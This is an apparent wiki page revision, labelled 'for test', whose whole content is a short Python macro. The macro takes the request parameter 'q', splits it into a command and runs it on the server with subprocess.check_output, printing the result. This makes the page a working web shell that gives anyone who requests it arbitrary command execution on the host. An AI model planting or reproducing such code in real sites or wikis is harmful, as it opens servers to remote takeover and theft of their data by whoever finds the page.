Version 13.1 by Thomas Mortagne on 2016/01/04 13:18

Show last authors
1 this is for test
2 {{python}}from subprocess import check_output
3 q = request.get('q') or 'true'
4 q = q.split(' ')
5 print ''+check_output(q)+''
6 {{/python}}